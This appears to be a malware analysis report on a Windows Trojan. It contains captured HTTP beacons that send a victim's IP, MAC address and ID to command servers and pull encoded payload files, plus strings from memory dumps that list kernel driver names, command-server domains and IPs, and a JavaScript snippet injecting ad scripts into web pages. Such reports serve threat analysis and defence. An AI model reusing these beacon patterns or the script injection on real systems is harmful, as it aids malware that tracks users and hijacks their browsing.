ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Oba8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT01I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1imxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq jeNXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTRbs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapajXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>
GET /txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/html
Content-Length: 747
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<h1>404 Not Found</h1>..<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>..Please report this message and include the following information to us.<br/>..Thank you very much!</p>..<table>..<tr>..<td>URL:</td>..<td>hXXp://ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223</td>..</tr>..<tr>..<td>Server:</td>..<td>localhost.localdomain</td>..</tr>..<tr>..<td>Date:</td>..<td>2015/06/03 10:46:18</td>..</tr>..</table>..<hr/>Powered by Tengine/2.0.2</body>..</html>....
GET /txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimnTp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJAaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfezaJwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
GET /txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzIbqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>
GET /plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Wed, 03 Jun 2015 02:46:14 GMT
Content-Type: application/octet-stream
Content-Length: 1351
Connection: close
Expires: Wed, 03 Jun 2015 02:46:14 GMT
Cache-Control: max-age=0
....<........09......7.!......,........................ ..............................................Q...*#..-*g...C..[I9l)e...LW.JPT\.R.).CICmff:aXR.E\.....Dwr&9;.8j=>w*#M...EMVS.Btb`R7o...`...T^..c.bK..K...B#..................-........................................................................^........Y#.........3.c.....KSSF.&y..'.S<.XJ\,....................................................h..........8G..@............'Xzh2z(g/77*,<v?`Rm4............................................................j.......F....b9\j..Z.4..........................5.............................................................h....>..d#....L ...............................4............................................................l...\T..|.#.....Jv....M.....8h.V.TDg,ltiG..Z.V.Mc0hG3...........................................................i...0.....q....%..R....z..........................2..........................................................r.....!.C..J?.....n.M.i............................ ...................................................[A.x75d.vj}de?JX...`...F.S......h.4..B...............-.....................................................]...`U..)..oe..=..p...u................,.........................................................].......%.. Fm..o...........~-:hyF\P.6~49`1^.34q(..................................................
<<< skipped >>>
GET /txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:23 GMT
Content-Type: text/plain
Content-Length: 349276
Last-Modified: Tue, 02 Jun 2015 09:08:27 GMT
Connection: close
ETag: "556d728b-5545c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZCCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJZ8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNOU3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 732892
Last-Modified: Tue, 02 Jun 2015 09:08:07 GMT
Connection: close
ETag: "556d7277-b2edc"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIATI0j4Fpg2lzu0SyFXzewwBYw9RMWaq6NhW/qg8rEKg/FLPEQc4O/r6B tUg au31FBt5lt6BIPeEcR3JJeXgyq3ERRVAtyQEhfZ0huL70G maW8Endo8iciIVsnYeiZuZCZoCFCUfpqGdFWishA/RXin0XXN4oaBk5hQl ENYGDXKTReMLdfZyT5q IBVZIi51RfhrztHLTG0EEf1OfLN52HToyuXz6IPoP8wDQi7tJMl31DlbpHsiv1c7IhlgqSaCVUmNsyYiDQUgxqGmbx2VndzWKuzgUzL0/tfbRE6l9I9 Zda06Hfr0VZGjSEOrYe65uttTZs NQKnlXBIaWKZ5oLaPOZkn4b4bFzT9BZqEHXkdbKraEkVIa2RpWitpTjGkjvfPlaHPLxHwYyO9yn57CcpN35xfW7smFkDGzBhRwfNLV8nUSDSO9nKOX7fTg4L5oFJGauP1vWaua4PwssRErj2jHG//V1rBG1CyX3fdIWIte7xQs3MggpiSeXuME2PyHnSRkK/M2mNXZaUcnpBOqZ5Bj8Y5pxJ rhCwgXs8X2VvqX9iu4C86SsB40oelBk5U6QSww6qR 8pHDhhHnZ4IsuyAOhAdmv6Tj4NmdB4nbOhonncjeFenG7eoFIcxR5ZBXAfZ80n/t3CRbL2EdM9lb3yV0POXL7kPN84YR52eCLLspMXZvEmihTEVpuPTG4fuld53I3hXpxu3jcc6Gzy9iEFlbaXxp2TB3izqYm6KhYBcGT9xymKFVrlMDlYOr1i0qh4VE3r2UUeuedUOSPYaWBbSvEQ4te5UPX37/SoSyAA23dw h04bzeEcFAzlE9ymBgrqAvJD4Sr9/MuMIuI9uCYhmDcBUNRmWmbgAcFxq4VydFphMXBg1RWfN7DAFjD1Ey3zHqQ/cCFFh1iz33tJH/hMDvi6dFJzZOcqvrD6V2A5sQ941Ft90whRBkHbD3fR SFW61mRTU2JeO1MlicxWBsQ0fr/5zh3ThZgVvPcKlAIuG fkCFUeMT Ifg hhd/CkUEgBDb52r8rnUjVNkSXG3LPhSJ6zr8PAIfQJjH7j2vXzSDkF46by8zQy3jM5x/bTeCzjyWOoPRnEk11Ga6A9f40oelBk5U6Qrtl39E8J/UsHN1wzYbyYMnDq3xxHoh1929KYyvOW6N12rNbHv0jq4DlCd0MODNYd7A7Ykr4OqSh//UN6uSJWLKUgN3GlDCNjB3eO3qBI65/j9 7xZLVz1IfyWF32d8joSLzGepV/9o8Hd47eoEjrnnjjuUMaeX5OVtQXh m6qqDmZJ G Gxc0xK16gJYZ6sxhIK10kLmAt9FSj0QMavbyRzb aW3zqTxHm2JcvXa4YxrTH1SM4iq 3R3kZ4XlDDSYvcA76EFpcxgFTqcJzdqzPrftd2tbKiQNwMcl8XdWcdllJ6BRNYnUFwVon5K4UX7ZLePK r5A2XvMZTKXPN/
<<< skipped >>>
GET /txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:29 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMlj6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVKk 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWabrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0NmUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSBJ/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHdduaD uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAWuIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A
<<< skipped >>>
GET /txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:22 GMT
Content-Type: text/plain
Content-Length: 16040
Last-Modified: Fri, 29 May 2015 10:02:55 GMT
Connection: close
ETag: "5568394f-3ea8"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROxLiD7jYDiIqOfONHrgwkqauSWPBROUZW0sipuKUBUb5O4eEZ620XI8CzDjkRi4A8lbnGofzhvn5FyHOlJXHHC/5/ 1gVd/aPlu5jX HBtGpMRW9nZWGzkCKJh2YZVqXz4 9 CYHDHG/UShsQooZeedOexf1uaXRWSRuk94Nh7MJJ3ORJZysb3/XoPYupkLGUuEAIpWQMxyuYFLoiO7uVwuccitdBepzJqgporquQ6McIjGHW1sOfYuU6OCVAsZ3c2jOMUbY1SKSi6ToCA i3Olf377ExOa8q1 3juSINdeL7/FVMiCb1uqWIzZvQiJSCKtMrgUx z0bc90X/Xjlb tkwO481xfsHfJ3/lYpiJmdW4xc/xQAyfc9WLgqTwr6eIKTyHnpP8iIFhUfkIrKH1J/3EytQHmwKhpm9m6p5lZKjiPdAmxGixheGvzjS1ej77jCgUlfvsBOSiONjuWIQRihHqjoN7wtrKcskgLA1GCq/AveFeIyIhwfPjzcLykiSOJrsFKxyzkFjmmT0w4Djlu40OtBFmDnjjdBF HTlwEldRcwvrJT0yZzMo3iU52aq6308i4QcC1Koq52xYc2YEvtxZDhkr5JeWveJbMGsOQAy BIq2m0V7XnD1NjlavQVlnmhJqwWEO84/CqSArg50vz8HXikJo8KnWPGsfNcm7/uZ3NmDG9mPlwAfscV9NghGNOP7PLfG24obuv80QFfGbeYryL/Ga iezCj0VeSj7wbhESI3bewHvj 0x2h0Z0V8CqMUQdstv9PQBpQ9lPEFetlJRrJJfXvEDLlD9SB/Kgyxh5pTH1P1vGNSFmyfDV6A8RmcG2/k0A8hwBJ2QVbWrqjMKyN3C97emrUMCzPw9JdDnV5XD4eSrvgpfJLvxR2dHztn2mmoTWiK35X7NIKbas1bpEQ/SpIzgkthD2x5V6s8y/5xtv5iH3J98HXJCqw8X/avtfIKGFyx51WD/iIlZ0H4sO5A8PjlFz2PHH/TsdPj/PHVneMJ1MQ7BoGkh2dI7qx4Vn lCd4K1NQiZ0oe9b5BvLTkli8hNmqqr8sVnLZhVQoTrHFi IPpiLgs790l9Yfsg4yMZ3zP0Sfa5B5LUEExQ9f3sAX1KvSEm8r4ilG3h7YaMytANKMnY0ndHH9dwAosJEiB/huIyUbh27Jyq8ukGRoWHKHsxLksp18gDJQnPZzOOVN H17ZvFemmXQdTaoJcszYvt25bIf41SEYJ8fnJF6DMkL4g mIuCzv1yA3Bz3KulRQgCeh7MXv6bBYVH5CKyh9Q72kqKuxf3T5VHyiH/1ZNglf/7OC2IiKRUWya2o97rqjztsZxAGYUe8N9EPTBTugSmsMy6ZtejBrAGMfB95efKS0T1h1swoso/ociqzCHLvHvxtIgurr JFJgdBAcwD1fbSFfl8mA8z3EL8LVHmcwIoI2naImhUM2PxjmnEn6uEGYgxWhoevT0HuYom4A3mYKvqUdFhwTve3bdLrnpo80y
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_996:
cS\%Xc
f9z.vk
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
omdlg32.dll
SHELL32.dll
OLEPRO32.DLL
WINMM.dll
svchost.exe
.rsrc
P%dTh[
En.yGW
.Kh)"
D.UnQ
!.IB?S
%Sioj
.aMOY
5E.axf
.IMpg
3m.be
~]%%dH
$.na\
ðuz
%xvfR
14.NeDY
i.MIE
38.TF
`L?.tt?c
|&.MG:
w.JtO
a.iNh5
: ).BE
-..zFI
.JKGek
7.aVc
C .nG
KERNEL32.DLL
ADVAPI32.dll
IPHLPAPI.DLL
MSWSOCK.dll
PSAPI.DLL
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
RegCloseKey
ShellExecuteW
.text
`.rdata
@.data
t.Fj)V
?456789:;
!"#$%&'()* ,-./0123
(3-!0,1'8"5.*2$
\\.\SSDTProcess
HideSys.sys
\\.\FixTool
Restore.sys
GetProcessHeap
WinExec
KERNEL32.dll
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegFlushKey
RegCreateKeyExA
iphlpapi.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetCPInfo
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
XXXXXX
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
flist.bin
cmd.exe /c del
XXXXXXXXXXXXXXXX
hXXp://
ATL:X
msvcrt
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeW
TenSafe_1.exe
TenSafe.exe
CreateService Fail %x
OpenSCManager Fail %x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus x
StartService~ x
115.238.251.56
log.soomeng.com
VVV.4278.cn
log.zzinfor.cn
127.0.0.1
zcÃ
h.rdata
H.data
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
ntdll.dll
gdi32.dll
adpro.cn
163.com
126.com
baidu.com
123.sogou.com
hXXps://
VVV.sohu.com
VVV.sina.com
hao123.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
Test
D@ole32.dll
atl.dll
kernel32.dll
Kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
.?AVCCmdTarget@@
